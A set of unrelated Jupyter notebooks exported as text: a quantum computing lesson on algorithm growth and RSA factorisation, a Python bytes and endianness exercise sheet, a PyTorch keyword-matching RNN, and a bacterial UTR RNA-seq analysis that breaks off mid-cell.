length of the input number (quadratic time) # # <!-- ::: --> # # <!-- ::: --> # # <!-- ::: --> # # Again, different computers will execute this algorithm at different speeds; a laptop can perform addition millions of times faster than a human can. But whether you can do a million operations a second or just one, the rate of growth will be the same. # # ![graph of constant and linear running times vs input sizes for different running times](images/why-qc/graph-linear-constant.svg) # # Here is one final example that is very particularly interesting to us. Let’s say I have a secret number (such as a PIN), and the problem is to guess it. In this case, the size of the problem is the length of the number. # # Let’s say the only way we can check if our answer is correct is by punching it into a keypad. Since we have no information about what that number might be, the best algorithm to find this secret number uses a ‘brute-force’ method, which means it does nothing clever and simply tries every possible number. # # How long would this take? Now, in theory we could get lucky and guess the answer in one go, but this is very unlikely. On average, we’d have to try around half the possible inputs, so the running time of our algorithm is proportional to the number of possible combinations. The question now becomes: How does the number of possible combinations grow with the length of the secret number? # # ![Animation showing the steps of a brute-force search algorithm](images/why-qc/search-algo.svg) # # Each digit we add to our secret number multiplies the number of possible combinations by 10. E.g. a secret number with 1 digit has 10 possible values (0, 1, 2, 3, 4, 5, 6, 7, 8 & 9), and a secret number with 2 digits has 100 possible values. Assuming the time taken to guess each password takes the same amount of time (regardless of the length), we can represent this mathematically like so: # # $$ \cssId{T}{T} \cssId{prop_to}{\propto} 10^\cssId{exp}{d}$$ # # You will notice the number of digits (d) is the exponent in this equation, and as such we say this is an _exponential time_ algorithm, and that the running time grows exponentially with the length of the input. # # ![graph of constant, linear and exponential running times vs input sizes for different running times](images/why-qc/graph-all.svg) # + [markdown] gloss={"intractable": {"text": "An intractable problem is one which can be solved in theory, but requires too many resources in practice.", "title": "Intractable"}} # ## Why do we measure algorithms like this? # # Different computers have different strengths; certain operations might be faster on one computer than another. By studying growth vs input size, we can ignore device-specific details and actually measure the _algorithm_, instead of the specific combination of algorithm and computer. Importantly, knowing how an algorithm scales with input size also tells us whether the algorithm will grow manageably or not. # # Let’s think about the linear-time addition algorithm we saw above. If we could add two 10-digit numbers in one second, due to the linear rate of growth, we should be able to add two 20-digit numbers in two seconds. Each extra 10 digits should add roughly one more second to our computation time. # # To contrast, imagine you could find a 10-digit PIN in 1 second using the exponential-time search algorithm above. This means your computer is fast enough to try \~5,000,000,000 combinations per second. We would expect this computer using this algorithm to take roughly 5,000,000,000 seconds (\~150 years) to find a 20-digit PIN. Adding another 10 digits increases this to around 150,000,000,000 years (\~120x the age of the universe). Exponential-time algorithms with even a modestly sized input (in this case \~30 digits) can become not just difficult, but literally impossible to carry out. # # While this PIN-finding problem is an artificial example we intended to be as simple as possible, there are many real problems in computer science for which we only have inefficient algorithms. Despite the impressive speed of today’s computers, these [intractable](gloss:intractable) problems can be too difficult for even the largest supercomputers. # # But if we can find algorithms that grow more efficiently, these intractable problems may suddenly become manageable, even with relatively slow or unreliable computers. This is where quantum computing comes in. # # ## How can quantum computing help? # # So far, we have thought of algorithms in a very abstract way, but the computers that execute these algorithms must exist in the real world. Whether these computers are high-powered microchips, or humans with pens and paper, all computers are ultimately governed by the laws of physics, and the operations they can perform limit the algorithms we can create. # # Physics is an attempt to work out the set of rules everything in the universe follows. Around the early 20th century, through delicate experiments in laboratories, physicists saw strange behaviours which their current physics could not explain. This meant the rules weren’t quite accurate, so they developed the more complete ‘quantum’ physics, which describes this behaviour very well. # # Physicists created quantum physics to explain behaviour they'd never seen before, and computer scientists found they could (in theory) exploit this newly discovered behaviour to create more efficient algorithms. As a result, there are certain problems that we believe are intractable for conventional computers, but are manageable for a ‘quantum’ computer that can exploit this behaviour. One such problem is _integer factorisation_. # # # Say we have an integer we'll call '$x$'. A factorizing algorithm finds the integers $p$ and $q$ such that $p×q = x$. This is sometimes easy; you can tell at a glance that $2000 = 2 × 1000$, but if $x$ is the product of two large prime numbers, this problem becomes very difficult. When we talk about integer factorisation, we’re going to assume the most difficult (worst-case) scenario. In the code cell below, we’re assigning a 250-digit number to the variable <code>x</code>: # - x = 2140324650240744961264423072839333563008614715144755017797754920881418023447140136643345519095804679610992851872470914587687396261921557363047454770520805119056493106687691590019759405693457452230589325976697471681738069364894699871578494975937497937 # + [markdown] gloss={"coreyears": {"text": "Conventional computer chips are often made from processors called <a href=\"https://en.wikipedia.org/wiki/Multi-core_processor\">\"cores\"</a>. A <i>core-year</i> is the equivalent of using one of these cores continuously for a year. For reference, a modern laptops have around 2-4 cores. The meaning of this number depends on how powerful the core is, but this should give you a rough idea of the computing power involved.", "title": "Core Year"}} # In 2020, researchers factorised this number using a classical supercomputer and ~2700 [core-years](gloss:coreyears) of processing power. This was a large effort, and record breaking at the time of writing. We can verify their results in the code cell below (fortunately, we do have efficient algorithms for multiplication!): # + p = 64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853367 q = 33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062711 p*q == x # Evaluates to 'True' # + [markdown] gloss={"RSA": {"text": "RSA numbers are numbers taken from the RSA factoring challenge. These numbers are intentionally chosen to be difficult to factor.<p>'RSA' are the initials of three of the people that invented the protocol that uses these large numbers to encrypt information.", "title": "RSA Number"}} # The output shown is the value of the last line of the cell. In this case we can see that <code>p*q == x</code> evaluates to <code>True</code>. Although not mathematically proven, we're pretty sure there’s no efficient algorithm for factoring such numbers on traditional computers. In fact, much of the internet’s encryption relies on the assumption that this problem is intractable, and that factoring a 617-digit [RSA](gloss:RSA) number is impossible. In contrast, we know of efficient factoring algorithms for quantum computers that, once we have big enough quantum computers, we estimate could factorise these numbers in under a day. # + [markdown] gloss={"noise": {"text": "Noise is useless information that's difficult to distinguish from useful information. For example, it's hard to hear someone talking to you if there are lots of other people talking loudly nearby.", "title": "Noise"}, "qiskit": {"text": "Qiskit is a software development kit for working with quantum computers.", "title": "Qiskit"}, "qubits": {"text": "A 'qubit' is a 'quantum bit'. We will study these later in this course.", "title": "Qubit"}, "transistor": {"text": "A transistor is an electronic device. They can be used to switch electric currents on and off, and can be used to build a computer processor.", "title": "Transistor"}} # ## Where are we now? # # We now know that quantum computers can carry out more efficient algorithms, but the quantum computers we have today are too small and unstable to give an advantage over traditional computers. # # At a very simple level, there are two factors that limit the size of problems our quantum computers can solve. The first is the amount of data they can store and work on, which we usually measure in [_qubits_](gloss:qubits). If we don’t have enough qubits, we simply can’t store and operate on problems above a certain size. The second is the error rate of our quantum computer; since we only see quantum behaviour in delicate laboratory experiments, creating quantum computers is a delicate process. The quantum computers we have right now are noisy, which means they often get things wrong and introduce ‘[noise](gloss:noise)’ into our results. Too much noise and our results will be nonsense! # # At the moment, the quantum computers we have are experimental. They're limited by qubit counts and error rates, so the biggest problems they can currently solve are still easily manageable for conventional computers. # # At some point in the future, this will change. We will reach ‘quantum advantage’, in which it will actually make economic sense to solve a problem using a quantum computer over a conventional computer. How do we know? _Because we measure algorithms by their rate of growth!_ We know that, as long as quantum computers keep developing steadily, they will eventually take over classical computers. # # ![comparison of (projected) classical vs quantum factoring abilities over time](images/why-qc/q-vs-c.svg) # # The estimate for factoring a 617-digit RSA number in under a day assumed ~20 million noisy qubits. At the time of writing, IBM currently has a 65-qubit quantum computer, and is aiming to create a system with over 1000 qubits by 2023. There are other algorithms that we believe will give us a quantum advantage long before this milestone, but it may still seem we are a long way off. # # We should remind ourselves of where conventional computers came from. Below is a picture of the first [transistor](gloss:transistor), created in 1947. Transistors are the building blocks of modern computer processors. # # ![comparison of (projected) classical vs quantum factoring abilities over time](images/why-qc/first-transistor.jpg) # Image credit: Federal employee <a href="https://clintonwhitehouse4.archives.gov/Initiatives/Millennium/capsule/mayo.html">Link</a>, <a href="https://commons.wikimedia.org/w/index.php?curid=554340">Public Domain</a>. # # 70 years later, our modern computer chips can contain billions of transistors. # # In the rest of this course, we will explore the quantum effects that allow us to create more efficient algorithms. By the end of this course you will be able to use the software package, [Qiskit](gloss:qiskit), to program a quantum computer to run one of these algorithms. # - # <!-- ::: q-block.exercise --> # # ### Quick quiz # # <!-- ::: q-quiz(goal="intro-why-qc-1") --> # # <!-- ::: .question --> # # Quantum computers will eventually... # # <!-- ::: --> # # <!-- ::: .option(correct) --> # # 1. ...do computations that are too difficult for conventional computers. # # <!-- ::: --> # # <!-- ::: .option --> # # 2. ...replace conventional computers. # # <!-- ::: --> # # <!-- ::: .option --> # # 3. ...increase the speed of conventional computers. # # <!-- ::: --> # # <!-- ::: --> # # <!-- ::: -->
notebooks/intro/why-quantum-computing.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + ############## PLEASE RUN THIS CELL FIRST! ################### # import everything and define a test runner function from importlib import reload from helper import run import helper # - # ### This is a Jupyter Notebook # You can write Python code and it will execute. You can write the typical 'hello world' program like this: # # ```python # print('hello world') # ``` # # You can execute by pressing shift-enter. Try it! You can also click the Run button in the toolbar. # print('hello world') # ### Exercise 1 # You can do a lot more than just print "hello world" # # This is a fully functioning Python3 interpreter so you can write functions and objects like in the next box. # # Try printing the 21st Fibonacci number below instead of the 11th. You can add caching if you want to practice coding in Python. # # + # Exercise 1 def fib(n): if n in (0,1): return 1 else: return fib(n-1) + fib(n-2) print(fib(20)) # CHANGE THIS LINE # - # ### A few things you should remember in Python 3 # # Strings and bytes are now different # # ```python # s = 'hello world' # b = b'hello world' # ``` # # These may look the same but the 'b' prefix means that the variable `b` is bytes whereas the variable `s` is a string. Basically, the on-disk characters on the system are bytes and the actual symbols in unicode are strings. A good explanation of the difference is [here](http://www.diveintopython3.net/strings.html). # s = 'hello world' b = b'hello world' print(s==b) # False # You convert from string to bytes this way: hello_world_bytes = s.encode('ascii') print(hello_world_bytes == b) # True # You convert from bytes to string this way: hello_world_string = b.decode('ascii') print(hello_world_string == s) # True # ### Imports # # You already have unit tests that are written for you. # Your task is to make them pass. # We can import various modules to make our experience using Jupyter more pleasant. # This way, making everything work will be a lot easier. # # this is how you import an entire module import helper # this is how you import a particular function, class or constant from helper import little_endian_to_int # used in the next exercise some_long_variable_name = 'something' # ### Exercise 2 # #### Jupyter Tips # # The two most useful commands are tab and shift-tab # # Tab lets you tab-complete. Try pressing tab after the `some` below. This will complete to the variable name that's there from the last cell. # # Shift-Tab gives you a function/method signature. Try pressing shift-tab after the `little_endian_to_int` below. That's also there from the last cell. # # + # Exercise 2 some_long_variable_name # press *tab* here little_endian_to_int() # press shift-tab here # - # ### Exercise 3 # # # Open [helper.py](/edit/session0/helper.py) and implement the `bytes_to_str` and `str_to_bytes` functions. Once you're done editing, run the cell below. # # # #### Make [this test](/edit/session0/helper.py) pass: `helper.py:HelperTest:test_bytes` # + # Exercise 3 reload(helper) run(helper.HelperTest('test_bytes')) # - # ### Getting Help # # If you can't get this, there's a [complete directory](/tree/session0/complete) that has the [helper.py file](/edit/session0/complete/helper.py) and the [session0.ipynb file](/notebooks/session0/complete/session0.ipynb) which you can use to get the answers. # # ### Useful Python 3 Idioms # # You can reverse a list by using `[::-1]`: # # ```python # a = [1, 2, 3, 4, 5] # print(a[::-1]) # [5, 4, 3, 2, 1] # ``` # # Also works on both strings and bytes: # # ```python # s = 'hello world' # print(s[::-1]) # 'dlrow olleh' # b = b'hello world' # print(b[::-1]) # b'dlrow olleh' # ``` # # Indexing bytes will get you the numerical value: # # ```python # print(b'&'[0]) # 38 since & is charcter #38 # ``` # # You can do the reverse by using bytes: # # ```python # print(bytes([38])) # b'&' # ``` # a = [1, 2, 3, 4, 5] print(a[::-1]) # [5, 4, 3, 2, 1] s = 'hello world' print(s[::-1]) # 'dlrow olleh' b = b'hello world' print(b[::-1]) # b'dlrow olleh' print(b'&'[0]) # 38 since & charcter #38 print(bytes([38])) # b'&' # ### Python Tricks # # Here is how we convert binary to/from hex: # print(b'hello world'.hex()) print(bytes.fromhex('68656c6c6f20776f726c64')) # ### Exercise 4 # Reverse this hex dump: `b010a49c82b4bc84cc1dfd6e09b2b8114d016041efaf591eca88959e327dd29a` # # Hint: you'll want to turn this into binary data, reverse and turn it into hex again # # + # Exercise 4 h = 'b010a49c82b4bc84cc1dfd6e09b2b8114d016041efaf591eca88959e327dd29a' # convert to binary (bytes.fromhex) hb = bytes.fromhex(h) # reverse ([::-1]) hr = hb[::-1] # convert to hex() print(hr.hex()) # print the result # - # ### Modular Arithmetic # # If you don't remember Modular Arithmetic, it's this function on python # # ```python # 39 % 12 # ``` # # The result is 3 because that is the remainder after division (39 / 12 == 3 + 3/12). # # Some people like to call it "wrap-around" math. If it helps, think of modular arithmetic like a clock: # # ![clock](http://latex.artofproblemsolving.com/f/4/d/f4daa2601de14fddf3d8441e16cc322a25e85354.png) # # Think of taking the modulo as asking the question "what hour will it be 39 hours from now?" # # If you're still confused, please take a look at [this](https://www.khanacademy.org/computing/computer-science/cryptography/modarithmetic/a/what-is-modular-arithmetic) article. # print(39 % 12) # ### Exercise 5 # # Find the modulo 19 of these numbers: # # * 99 # * \\(456 \cdot 444\\) # * \\(9^{77}\\) # # (note python uses ** to do exponentiation) # # + # Exercise 5 prime = 19 print(99 % prime) print((456 * 444) % prime) print(9**77 % prime) # - # ### Converting from bytes to int and back # # Converting from bytes to integer requires learning about Big and Little Endian encoding. Essentially any number greater than 255 can be encoded in two ways, with the "Big End" going first or the "Little End" going first. # # Normal human reading is from the "Big End". For example 123 is read as 100 + 20 + 3. Some computer systems encode integers with the "Little End" first. # # A number like 500 is encoded this way in Big Endian: # # 0x01f4 (256 + 244) # # But this way in Little Endian: # # 0xf401 (244 + 256) # # In Python we can convert an integer to big or little endian using a built-in method: # # ```python # n = 1234567890 # big_endian = n.to_bytes(4, 'big') # b'\x49\x96\x02\xd2' # little_endian = n.to_bytes(4, 'little') # b'\xd2\x02\x96\x49' # ``` # # We can also convert from bytes to an integer this way: # # ```python # big_endian = b'\x49\x96\x02\xd2' # n = int.from_bytes(big_endian, 'big') # 1234567890 # little_endian = b'\xd2\x02\x96\x49' # n = int.from_bytes(little_endian, 'little') # 1234567890 # ``` # # n = 1234567890 big_endian = n.to_bytes(4, 'big') little_endian = n.to_bytes(4, 'little') print(big_endian.hex()) print(little_endian.hex()) print(int.from_bytes(big_endian, 'big')) print(int.from_bytes(little_endian, 'little')) # ### Exercise 6 # Convert the following: # # * 8675309 to 8 bytes in big endian # * interpret ```b'\x11\x22\x33\x44\x55'``` as a little endian integer # # + # Exercise 6 n = 8675309 little_endian = b'\x11\x22\x33\x44\x55' print(n.to_bytes(8, "big")) print(little_endian.hex()) # - # ### Exercise 7 # # # We'll want to convert from little-endian bytes to an integer often, so write a function that will do this. # # # #### Make [this test](/edit/session0/helper.py) pass: `helper.py:HelperTest:test_little_endian_to_int` # + # Exercise 7 reload(helper) run(helper.HelperTest('test_little_endian_to_int')) # - # ### Exercise 8 # # # Similarly, we'll want to do the inverse operation, so write a function that will convert an integer to little-endian bytes given the number and the number of bytes it should take up. # # # #### Make [this test](/edit/session0/helper.py) pass: `helper.py:HelperTest:test_int_to_little_endian` # + # Exercise 8 reload(helper) run(helper.HelperTest('test_int_to_little_endian')) # -
session0/session0.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import random import torch import torch.nn as nn import torch.optim as optim from torch.utils.data import DataLoader, Dataset from torch.nn.utils.rnn import pad_sequence import torch.nn.functional as F import re import pandas as pd import time import math import matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib import style import pickle device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print(torch.cuda.is_available()) from tqdm import tqdm import math # - # # Introduction # This notebook contains a model I made from scratch to evaluate if a keyword(short sentence or a word) and a sentence( a long sentence or a paragraph) is a match. I used two encoder RNNs, one for the keyword and one for the description, plus a Attention-like mechanism, but not as complicated as Attention.(see the model part for more detail) # # Define classes and functions # ### Tool classes style.use("ggplot") plt.switch_backend('agg') def showPlot(points): # %matplotlib inline plt.plot(points) # + def asMinutes(s): m = math.floor(s / 60) s -= m * 60 return '%dm %ds' % (m, s) def timeSince(since, percent): now = time.time() s = now - since es = s / (percent) rs = es - s return '%s (- %s)' % (asMinutes(s), asMinutes(rs)) # - # Geting a list of words from a sentence. This function is typically useful for ecommerce sites that use chinese as their main language. Note that one can modify this part according to her needs. def get_word_list(s1): regEx = re.compile('([\u4e00-\u9fa5]|[^a-zA-Z0-9_-]+)') res = re.compile(r"([\u4e00-\u9fa5])") p1 = regEx.split(str(s1).lower()) str1_list = [] for stri in p1: if res.split(stri) == None: str1_list.append(stri) else: ret = res.split(stri) for ch in ret: str1_list.append(ch) list_word1 = [w for w in str1_list if len(w) != 0] return list_word1 # ### Dataset classes # I defined my own data class to store data in pandas class Vocabulary: def __init__(self, freq_threshold): self.itos = {0: "<PAD>", 1: "<SOS>", 2: "<EOS>", 3: "<UNK>"} self.stoi = {"<PAD>": 0, "<SOS>": 1, "<EOS>": 2, "<UNK>": 3} self.freq_threshold = freq_threshold def __len__(self): return len(self.itos) @staticmethod def tokenizer_ch(text): return get_word_list(text) def build_vocabulary(self, sentence_list): frequencies = {} idx = 4 for sentence in sentence_list: for word in self.tokenizer_ch(sentence): if word not in frequencies: frequencies[word] = 1 else: frequencies[word] += 1 if frequencies[word] == self.freq_threshold: self.stoi[word] = idx self.itos[idx] = word idx += 1 def numericalize(self, text): tokenized_text = self.tokenizer_ch(text) return [ self.stoi[token] if token in self.stoi else self.stoi["<UNK>"] for token in tokenized_text ] class MyDataset(Dataset): def __init__(self, root_dir, captions_file, freq_threshold=5,vocab = None): self.root_dir = root_dir self.df = pd.read_csv(captions_file) # Get key, des, score columns self.key = self.df["pre_search_word"] self.desc = self.df["name"] self.score = self.df["y"] # Initialize vocabulary and build vocab if vocab == None: self.vocab = Vocabulary(freq_threshold) self.vocab.build_vocabulary(self.desc.tolist()+self.key.tolist()) else: self.vocab = vocab def __len__(self): return len(self.df) def __getitem__(self, index): key = self.key[index] desc = self.desc[index] score = self.score[index] numericalized_key = [self.vocab.stoi["<SOS>"]] numericalized_key += self.vocab.numericalize(key) numericalized_key.append(self.vocab.stoi["<EOS>"]) numericalized_desc = [self.vocab.stoi["<SOS>"]] numericalized_desc += self.vocab.numericalize(desc) numericalized_desc.append(self.vocab.stoi["<EOS>"]) return torch.tensor(score), torch.tensor(numericalized_key), torch.tensor(numericalized_desc) class MyCollate: def __init__(self, pad_idx): self.pad_idx = pad_idx def __call__(self, batch): scores = [item[0] for item in batch] scores = torch.tensor(scores) keys = [item[1] for item in batch] keys = pad_sequence(keys, batch_first=False, padding_value=self.pad_idx) descs = [item[2] for item in batch] descs = pad_sequence(descs, batch_first=False, padding_value=self.pad_idx) return scores, keys, descs def get_loader( root_folder, file_name, batch_size=32, num_workers=8, shuffle=False, pin_memory=True, dataset = None, start_from = 0, vocab = None): if dataset == None: dataset = MyDataset(root_folder, file_name,vocab = vocab) if start_from != 0: dataset.df = dataset.df[start_from:].reset_index(drop=True) dataset.key = dataset.key[start_from:].reset_index(drop=True) dataset.desc = dataset.desc[start_from:].reset_index(drop=True) dataset.score = dataset.score[start_from:].reset_index(drop=True) pad_idx = dataset.vocab.stoi["<PAD>"] loader = DataLoader( dataset=dataset, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, pin_memory=pin_memory, collate_fn=MyCollate(pad_idx=pad_idx), ) return loader, dataset def get_or_load_data(batch_size = 1,from_csv_file = False,save = False,csv_file = "train.csv",start_from = 0, vocab = None): if from_csv_file == False: with open('dataloader.pkl', 'rb') as input: dataset = pickle.load(input) data_start = pickle.load(input) train_loader, dataset = get_loader("", csv_file ,batch_size = batch_size,dataset = dataset,start_from = start_from-data_start) else: train_loader, dataset = get_loader("", csv_file ,batch_size = batch_size,vocab = vocab) if save == True: with open('dataloader.pkl', 'wb') as output: pickle.dump(dataset, output, pickle.HIGHEST_PROTOCOL) total_batches = len(train_loader) vocab_size = len(dataset.vocab) return train_loader, dataset, total_batches, vocab_size # ### Model # The idea is that: we want our model to mimic how we evaluate the relation, which is : first we remember the keyword and we see through the sentence to see if there is the pattern of our keyword in the sentence. # # The training steps: # 1. We feed our keyword into the EncoderK to encode the keyword to a vector. # 2. We concate the encoded keyword to every word of the sentence to make sure our model remember the keyword when reading the sentence (one can also use the Attention mechanism, but since our keyword are usually very short here, I don't think that is necessary) # 3. We feed the concated sentence to the EncoderD to make prediction. class EncoderK(nn.Module): def __init__(self, vocab_size, hidden_size, num_layers, p): super(EncoderK, self).__init__() self.hidden_size = hidden_size self.num_layers = num_layers self.embedding = nn.Embedding(vocab_size, hidden_size) self.rnn = nn.LSTM(hidden_size, hidden_size, num_layers, bidirectional=True,dropout = p) def forward(self, x): # x: (seq_length, N) where N is batch size embedding = self.embedding(x) # embedding shape: (seq_length, N, embedding_size) encodedK, (hidden, cell) = self.rnn(embedding) #encoder_states: (seq_len, N, 2* hidden_size) #hidden: (num_layers * 2, N, hidden_size) #cell: (num_layers * 2, N, hidden_size) return encodedK[-1,:,:], hidden, cell class EncoderD(nn.Module): def __init__(self, vocab_size, hidden_size, num_layers, p): super(EncoderD, self).__init__() self.embedding = nn.Embedding(vocab_size, hidden_size) self.rnn = nn.LSTM(hidden_size*3, hidden_size, num_layers, bidirectional=True,dropout = p) self.ff = nn.Linear(hidden_size*2,2) self.dropout = nn.Dropout(p) def forward(self, x, encodedK,hidden, cell): # x: (seq_length, N) where N is batch size #encodedK: (1, N, 2* hidden_size) #hidden: (num_layers * 2, N, hidden_size) #cell: (num_layers * 2, N, hidden_size) embedding = self.dropout(self.embedding(x)) # embedding shape: (seq_length, N, hidden_size) encodedK = encodedK.repeat(embedding.shape[0],1,1) embedding = torch.cat((embedding, encodedK),2) out, _ = self.rnn(embedding) # outputs shape: (seq_length, N, hidden_size) out = self.dropout(out[-1,:,:]) out = self.ff(out) return out def get_encoders(new = False,model_num = 1): plot_losses = [] start_from = 0 if new == True: encoderK1 = EncoderK(vocab_size,hidden_size,num_layers,p).to(device) encoderD1 = EncoderD(vocab_size,hidden_size,num_layers,p).to(device) else: with open('model'+str(model_num)+'.pkl', 'rb') as input: encoderK1 = pickle.load(input) encoderD1 = pickle.load(input) plot_losses = pickle.load(input) start_from = pickle.load(input) return encoderK1, encoderD1, plot_losses, start_from # ### Train function def train_model(num_epochs = 1,plot_every = 500,print_every = 5000,save_every = 50000,start_from = 0): encoderD1.train() encoderK1.train() for ep in range(num_epochs): if num_epochs != 1: print("epoch: ",ep+1) print("=================================================================================================================") global batch_count batch_count = 0 plot_loss_total = 0 print_loss_total = 0 start = time.time() for idx, (scores, keys, descs) in enumerate(train_loader): encoderK_optimizer.zero_grad() encoderD_optimizer.zero_grad() keys = keys.to(device) scores = scores.to(device) descs = descs.to(device) encodedK, hidden, cell = encoderK1(keys) prediction = encoderD1(descs,encodedK,hidden,cell) loss = criteria(prediction, scores) loss.backward() encoderK_optimizer.step() encoderD_optimizer.step() plot_loss_total += loss print_loss_total += loss batch_count+=1 if batch_count % plot_every == 0: plot_loss_avg = plot_loss_total / plot_every plot_losses.append(plot_loss_avg) plot_loss_total = 0 if batch_count % print_every == 0: print('%s (%d %d%%) %.4f' % (timeSince(start, (batch_count) / (total_batches)),batch_count+start_from, (batch_count+start_from) / (total_batches+start_from) * 100, print_loss_total/print_every)) print_loss_total = 0 if batch_count % save_every == 0: num = (batch_count//save_every)%2+1 with open('model'+str(num)+'.pkl', 'wb') as output: pickle.dump(encoderK1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(encoderD1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(plot_losses, output, pickle.HIGHEST_PROTOCOL) pickle.dump(batch_count+start_from, output, pickle.HIGHEST_PROTOCOL) print("Saved model"+str(num)+".\nBatch count: ",batch_count) with open('model'+str(num%2+1)+'.pkl', 'wb') as output: pickle.dump(encoderK1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(encoderD1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(plot_losses, output, pickle.HIGHEST_PROTOCOL) pickle.dump(0, output, pickle.HIGHEST_PROTOCOL) print("Saved model"+str(num)+". End of epoch ",ep) # ### Evaluate function def evaluate(test_loader,encoderK1,encoderD1,threshold = 0.5,sample_size = 10000,print_index = False): with torch.no_grad(): encoderK1.eval() encoderD1.eval() right_num = 0 total_num = 0 total_loss = 0.0 pbar = tqdm(total = sample_size,position=0, leave=True) for idx, (scores, keys, descs) in enumerate(test_loader): keys = keys.to(device) scores = scores.to(device) descs = descs.to(device) encodedK, hidden, cell = encoderK1(keys) prediction = encoderD1(descs,encodedK,hidden,cell) loss = criteria(prediction, scores) predic_prob = F.log_softmax(prediction) if predic_prob[0][scores.item()].item() > math.log(threshold): right_num += 1 total_num += 1 else: total_num += 1 if print_index == True: print(idx,predic_prob[0][scores.item()].item()) total_loss += loss.item() pbar.update() if total_num == sample_size: break encoderK1.train() encoderD1.train() return total_loss/total_num, right_num, total_num # # Start running # ### Define hyperparameters # + learning_rate = 0.0001 num_epochs = 1 batch_size = 1 hidden_size = 512 num_layers = 1 p = 0.2 plot_every = 500 #unit: batchs print_every = 5000 # - # ### Create model instance # + encoderK1, encoderD1, plot_losses, start_from = get_encoders(new = True,model_num =1) # new = False for loading model using pickle encoderK_optimizer = optim.SGD(encoderK1.parameters(), lr=learning_rate,momentum=0.9) encoderD_optimizer = optim.SGD(encoderD1.parameters(), lr=learning_rate,momentum=0.9) criteria = nn.CrossEntropyLoss() # - # ### Load data train_loader, dataset, total_batches, vocab_size = get_or_load_data(batch_size = batch_size,from_csv_file = False,save = False,start_from=start_from) print(vocab_size) # ### Train train_model(num_epochs = 1,plot_every = 5000,print_every = 50000,save_every = 500000,start_from = start_from) # + #used for saving model when training accidently ended num = 2 with open('model'+str(num)+'.pkl', 'wb') as output: pickle.dump(encoderK1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(encoderD1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(plot_losses, output, pickle.HIGHEST_PROTOCOL) pickle.dump(batch_count+start_from, output, pickle.HIGHEST_PROTOCOL) print("Saved model"+str(num)+".\nBatch count: ",batch_count+start_from) # - showPlot(plot_losses) # ### Evaluate test_loader, test_dataset, test_total_batches, _ = get_or_load_data(batch_size = 1,from_csv_file = True,save = False,csv_file = "test.csv",vocab = dataset.vocab) avg_loss, right_num, total_num = evaluate(test_loader,encoderK1,encoderD1,threshold = 0.5,sample_size = 5000,print_index=True) print("right: ",right_num," out of: ",total_num," Accuracy: ",right_num/total_num) print("avg loss: ",avg_loss) print("Done!")
model_verify_pair.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + jupyter={"outputs_hidden": false} # %matplotlib inline # + jupyter={"outputs_hidden": false} import pandas as pd import numpy as np import os from plotnine import * # - # ## Overview # * select 5'UTRs longer than 80 nt # * count reads aligned to these UTRs (pysam) # * plot utr reads -bcm vs utr reads + bcm # * select UTRs with increased number of reads upon addition of BCM (clustering?) # * compare selected UTRs with genes upregulated in the stationary phase as discovered by DESeq2 # * compare selected UTRs with small RNA binding sites (pybedtools?) # ### Sample table and barcodes # + jupyter={"outputs_hidden": false} # Sample titles with corresponding barcodes samples = { 's9': ['ATCACG', 'ACAGTG'], 's9+bcm': ['CGATGT', 'GCCAAT'], 's17': ['TTAGGC', 'GATCAG'], 's17+bcm': ['TGACCA', 'TAGCTT'], 's19': ['CAGATC','GGCTAC'], 's19+bcm': ['ACTTGA', 'CTTGTA'] } # Barcodes barcodes = ['ATCACG', 'ACAGTG', 'CGATGT', 'GCCAAT', 'TTAGGC', 'GATCAG', 'TGACCA', 'TAGCTT', 'CAGATC','GGCTAC', 'ACTTGA', 'CTTGTA'] # - # ### Load counts for genes, calculate counts in UTRs longer than 80 nt # # Gene counts were obtained using `htseq` program against the standard NC_000913 .GFF file The was I calculate reads in UTRs here is not strand-specific. So the numbers can be confounded if there is a transcript going in the opposite direction. We can solve this later if needed. # + jupyter={"outputs_hidden": false} dfm = pd.read_csv('../../data/dfm.csv', sep='\t') dfm # - # ### Normalize counts for feature length, log-transform, and take means for replicates # # Pseudo-counts (+1) are added during UTR reads counting to make sure we can log-transform the data. # + jupyter={"outputs_hidden": false} id_vars = ['TSS','TU_name','coord_5','coord_3','gene', 'UTR_length'] value_vars = ['s9','s17','s19','s9+bcm','s17+bcm','s19+bcm'] dfn = dfm.copy() # Normalize counts by gene and utr length def norm_orf(barcode, rec): return float(rec[barcode] / abs(rec['first_gene_5'] - rec['first_gene_3'])) def norm_utr(barcode, rec): return float(rec['utr_{0}'.format(barcode)] / rec['UTR_length']) for barcode in barcodes: dfn['orf_{0}'.format(barcode)] = dfn.apply(lambda rec: norm_orf(barcode, rec), axis=1) dfn['utr_{0}'.format(barcode)] = dfn.apply(lambda rec: norm_utr(barcode, rec), axis=1) df = dfn[id_vars].copy() # Take means across replicates according to the samples dict for sample, bcs in samples.items(): df['orf_{0}'.format(sample)] = np.log10(dfn[['orf_{0}'.format(b) for b in list(bcs)]].mean(axis=1)) df['utr_{0}'.format(sample)] = np.log10(dfn[['utr_{0}'.format(b) for b in list(bcs)]].mean(axis=1)) df # - # ### Plot wild type with vs without BCM # # Two clusters are apparent. We are after the UTRs that are upregulated by the addition of BCM (cloud of points in the left part of the plot along y=0 line and in general (significantly) above y=x line). # # BTW, the point size is the length of UTR. No (apparent) correlation here. # + jupyter={"outputs_hidden": false} (ggplot(df, aes(x='utr_s9', y='utr_s9+bcm', size='UTR_length')) + geom_point(size=0.5, alpha=0.1) + geom_abline(slope=1, intercept=0, size=.5, color='#586e75') ) # + jupyter={"outputs_hidden": false} (ggplot(df, aes(x='utr_s9', 